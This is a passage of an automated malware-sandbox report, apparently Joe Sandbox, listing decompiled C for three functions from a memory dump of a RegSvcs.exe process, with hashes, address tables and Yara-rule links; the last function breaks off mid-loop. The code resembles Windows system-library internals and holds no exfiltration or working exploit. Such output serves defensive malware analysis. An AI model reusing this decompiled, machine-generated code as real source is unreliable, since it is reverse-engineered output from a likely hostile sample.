0x01935942
0x00000000
0x01935944
0x01935944
0x01935949
0x0193594e
0x0193594e
0x01935953
0x0193595b
0x01935976
0x01935976
0x0193597a
0x0193597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01935981
0x01935981
0x01935981
0x01935983
0x01935988
0x0193598d
0x01935991
0x01935991
0x00000000
0x0193595d
0x0193595d
0x01935963
0x01935965
0x00000000
0x00000000
0x00000000
0x00000000
0x01935967
0x01935967
0x0193596b
0x0193596d
0x00000000
0x00000000
0x0193596f
0x01935971
0x01935971
0x01935974
0x00000000
0x00000000
0x00000000
0x01935974
0x00000000
0x01935967
0x0193595b
0x01935942
0x01935863
0x018f2143
0x018f2143
0x018f2149
0x018f214f
0x018f22f1
0x018f22f6
0x00000000
0x018f2173
0x018f2173
0x018f217d
0x018f2181
0x018f2186
0x019359ae
0x019359b2
0x019359b5
0x019359b7
0x019359ba
0x019359cd
0x019359d1
0x019359d5
0x019359d9
0x019359db
0x00000000
0x00000000
0x019359dd
0x019359dd
0x019359e1
0x019359e4
0x019359e7
0x019359ee
0x019359ee
0x019359f3
0x019359f3
0x00000000
0x018f2186
0x018f214f
0x018f2106
0x018f2266
0x018f20d8
0x018f20da
0x018f20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d0137f7b6393128ef974abdd52280fd86317d8637c2a683d314f65997dc862
Instruction ID: d4aeb282277ca673d0697755e3b0b48b4a36036db38bb2b603a35abd3021ac15
Opcode Fuzzy Hash: 16d0137f7b6393128ef974abdd52280fd86317d8637c2a683d314f65997dc862
Instruction Fuzzy Hash: D3F117756083419FE726CF2CC48076ABBE6BFC9724F05851DEA99CB291D734D941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 018D849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E018D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x199f9c0);
				E0191D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x19b7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E018DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E018E2280( *[fs:0x30], 0x19b8550);
						_t139 =  *0x19b7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E018FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E018DFFB0(_t193, _t235, 0x19b8550);
								L5:
								return E0191D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E018C1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x19b7b9c; // 0x0
							_t235 = L018E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x19b7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E018FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E018DFFB0(_t193, _t235, 0x19b8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L018E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L018E77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x19b7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x19b7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E019037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x19b7b9c; // 0x0
									_t214 = L018E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E019037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x19b7b10 =  *0x19b7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x19b7b04 =  *0x19b7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L018E77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L018E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x19b7b08 =  *0x19b7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E019057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0190F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L018E77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E018FA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L018E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E019096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x018d849b
0x018d849b
0x018d849b
0x018d849b
0x018d849d
0x018d84a2
0x018d84a7
0x018d84b1
0x018d84d8
0x00000000
0x018d84b3
0x018d84c4
0x018d84c9
0x018d84cd
0x018d84cf
0x018d84cf
0x018d84d6
0x018d84e6
0x018d84e9
0x018d84ec
0x018d84ef
0x018d84f2
0x018d84f4
0x018d84fc
0x018d8501
0x018d8506
0x018d8509
0x018d86e0
0x018d86e5
0x018d86e8
0x018d86ed
0x018d86f0
0x018d86f2
0x01929afd
0x01929b02
0x018d84da
0x018d84df
0x018d84df
0x018d86fa
0x018d86fd
0x018d86fe
0x018d8701
0x018d8706
0x018d8709
0x018d870b
0x00000000
0x00000000
0x018d8711
0x018d8725
0x018d8727
0x018d872a
0x018d872c
0x01929af0
0x01929af5
0x018d8732
0x018d8732
0x018d8732
0x018d8735
0x018d8737
0x018d8515
0x018d8515
0x018d8518
0x018d851d
0x018d8523
0x018d8527
0x018d852b
0x018d8537
0x018d8539
0x018d853c
0x018d853e
0x018d868c
0x018d8691
0x018d8699
0x018d869b
0x018d8744
0x018d8748
0x018d86a1
0x018d86a1
0x018d86a1
0x018d86a4
0x018d86a8
0x01929bdf
0x01929bdf
0x018d86ae
0x018d86b0
0x00000000
0x018d86b6
0x00000000
0x01929be9
0x018d86b0
0x018d8544
0x018d854a
0x018d854d
0x018d8551
0x018d876e
0x018d8778
0x018d877b
0x018d8780
0x018d8557
0x018d8557
0x018d855d
0x018d855d
0x018d856b
0x018d856e
0x018d8570
0x018d8573
0x018d8576
0x018d8576
0x018d8579
0x018d857b
0x00000000
0x00000000
0x018d8581
0x018d85a0
0x018d85a2
0x018d85a5
0x018d85a7
0x01929b1b
0x01929b1b
0x018d862e
0x018d862e
0x018d8631
0x018d8631
0x018d8634
0x018d8636
0x018d8669
0x018d8669
0x018d866b
0x01929bbf
0x01929bc4
0x01929bc8
0x01929bce
0x01929bce
0x018d8671
0x018d8671
0x018d8674
0x018d8676
0x01929bae
0x01929bae
0x018d8676
0x018d867c
0x018d867e
0x018d8688
0x018d8688
0x00000000
0x018d867e
0x018d8638
0x018d8638
0x018d863b
0x018d863e
0x018d863f
0x018d8642
0x018d8645
0x018d8648
0x018d864d
0x01929b69
0x01929b6e
0x01929b7b
0x01929b81
0x01929b85
0x01929b89
0x01929ba7
0x01929b8b
0x01929b91
0x01929b9a
0x01929b9f
0x01929b9f
0x018d8788
0x018d878d
0x018d8763
0x018d8763
0x018d8766
0x00000000
0x018d8766
0x01929b70
0x00000000
0x01929b70
0x018d8656
0x018d865a
0x018d865c
0x018d8752
0x018d8756
0x00000000
0x00000000
0x018d875e
0x00000000
0x018d875e
0x018d8662
0x018d8662
0x018d8662
0x018d8666
0x00000000
0x018d8666
0x018d85b7
0x018d85b9
0x018d85bc
0x018d85bf
0x018d85cc
0x018d85d1
0x018d85d4
0x018d85db
0x018d85de
0x018d85e0
0x01929b5f
0x00000000
0x01929b5f
0x018d85e6
0x018d85ea
0x018d86c3
0x018d86c5
0x018d86c8
0x018d86ca
0x01929b16
0x00000000
0x01929b16
0x018d86d6
0x018d85f6
0x018d85f6
0x018d85f9
0x018d8602
0x018d8606
0x018d860a
0x018d860b
0x018d860e
0x018d8611
0x00000000
0x018d8611
0x018d85f3
0x00000000
0x018d85f3
0x018d8619
0x018d861e
0x018d861e
0x018d8621
0x018d8622
0x018d8623
0x018d8625
0x018d862c
0x00000000
0x018d873d
0x00000000
0x018d873d
0x018d8737
0x018d850f
0x018d8512
0x00000000
0x018d8512
0x00000000
0x018d84d6

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7080ca076696e07a6e013ab005bcb8e4b31606264f13b14bacbf12e7cf3537
Instruction ID: 4e31c62ec51f4b267fd96e96fd78f5273db03ff64dbce4b0561857377271fa48
Opcode Fuzzy Hash: ec7080ca076696e07a6e013ab005bcb8e4b31606264f13b14bacbf12e7cf3537
Instruction Fuzzy Hash: F3B17C70E04319DFDB19CFD9D984AADBBB9BF8A314F104129E509EB245D770AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 018CC600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E018CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x19bd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E018D6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0190B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x19b7b9c; // 0x0
					_t74 = L018E4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01909650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L018E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0190F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E019013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L018E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01909650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x018cc608
0x018cc615
0x018cc625
0x018cc62d
0x018cc635
0x018cc640
0x018cc680
0x018cc687
0x018cc688
0x018cc689
0x018cc694
0x018cc694
0x018cc642
0x018cc64a
0x018cc697
0x01937a25
0x01937a2b
0x01937a2e
0x01937a30
0x01937bea
0x01937bea
0x00000000
0x01937bea
0x01937a36
0x01937a43
0x01937a48
0x01937a4c
0x01937a4e
0x00000000
0x00000000
0x01937a58
0x01937a5a
0x01937a5b
0x01937a5c
0x01937a5d
0x01937a63
0x01937a64
0x01937a6a
0x01937a6c
0x01937a6e
0x019379cb
0x019379cb
0x019379ce
0x019379d0
0x01937a98
0x01937a9b
0x01937a9b
0x01937a9e
0x01937aa1
0x01937bbe
0x01937bbe
0x01937bc0
0x01937be0
0x01937be0
0x01937a01
0x01937a01
0x01937a05
0x01937a07
0x01937a15
0x01937a15
0x01937a1a
0x00000000
0x01937a1a
0x01937bc2
0x01937bc6
0x01937bc9
0x01937bcd
0x01937bcf
0x019379e6
0x019379e6
0x019379eb
0x019379eb
0x019379ef
0x019379f1
0x00000000
0x00000000
0x019379f3
0x019379f5
0x019379ff
0x019379ff
0x00000000
0x019379ff
0x019379f7
0x019379fd
0x00000000
0x00000000
0x00000000
0x019379fd
0x01937bd5
0x01937bd8
0x00000000
0x00000000
0x01937ba9
0x01937bac
0x01937bb0
0x01937bb1
0x01937bb1
0x01937bb6
0x00000000
0x01937bb6
0x01937aa7
0x01937aaa
0x00000000
0x00000000
0x01937ab2
0x01937ab3
0x01937ab5
0x01937aec
0x01937aef
0x01937b25
0x01937b28
0x01937b62
0x01937b64
0x01937b8f
0x01937b92
0x01937b96
0x01937b98
0x00000000
0x00000000
0x01937b9e
0x01937b9f
0x01937ba3
0x00000000
0x01937ba3
0x01937b66
0x01937b68
0x01937ae2
0x01937ae2
0x00000000
0x01937ae2
0x01937b6e
0x01937b72
0x01937b75
0x01937b81
0x01937b85
0x01937b87
0x00000000
0x00000000
0x01937b31
0x01937b34
0x01937b3c
0x01937b45
0x01937b46
0x01937b4f
0x01937b51
0x01937b57
0x01937b59
0x01937b59
0x00000000
0x01937b59
0x01937b77
0x00000000
0x01937b77
0x01937b2a
0x00000000
0x01937b2a
0x01937af1
0x01937af3
0x00000000
0x00000000
0x01937afb
0x01937afc
0x01937afe
0x00000000
0x00000000
0x01937b00
0x01937b03
0x00000000
0x00000000
0x01937b05
0x01937b09
0x01937b0d
0x01937b0f
0x00000000
0x00000000
0x01937b18
0x01937b1d
0x00000000
0x01937b1d
0x01937ab7
0x01937ab9
0x00000000
0x00000000
0x01937abf
0x01937ac1
0x00000000
0x00000000
0x01937ac3
0x01937ac6
0x00000000
0x00000000
0x01937ac8
0x01937acc
0x01937ad0
0x01937ad2
0x00000000
0x00000000
0x01937adb
0x00000000
0x01937adb
0x019379d6
0x019379d9
0x019379dc
0x01937a91
0x01937a94
0x00000000
0x01937a94
0x019379e2
0x00000000
0x019379e2
0x01937a74
0x01937a7a
0x00000000
0x00000000
0x01937a8a
0x01937a21
0x01937a21
0x00000000
0x01937a21
0x018cc650
0x018cc651
0x018cc656
0x018cc65c
0x018cc65d
0x018cc663
0x018cc664
0x018cc66a
0x018cc66e
0x019379c5
0x019379c7
0x00000000
0x019379c7
0x018cc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc07b407153c6b23cca291c910a1f4e1c37115003b1f144fe71bf87b343fc5f9
Instruction ID: a35cd2e628a5303b90996c0e9360893cb7b0090feddf60ffb682e74be280f8cb
Opcode Fuzzy Hash: dc07b407153c6b23cca291c910a1f4e1c37115003b1f144fe71bf87b343fc5f9
Instruction Fuzzy Hash: 478191B56042068BDB2ECE98C880E3A77E9EBC4354F14492EEE4DDB641D330DD41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0195B8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0195B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x19b7b9c; // 0x0
				_t124 = L018E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01909800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E019095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E019095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L018E77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01909910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E019095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
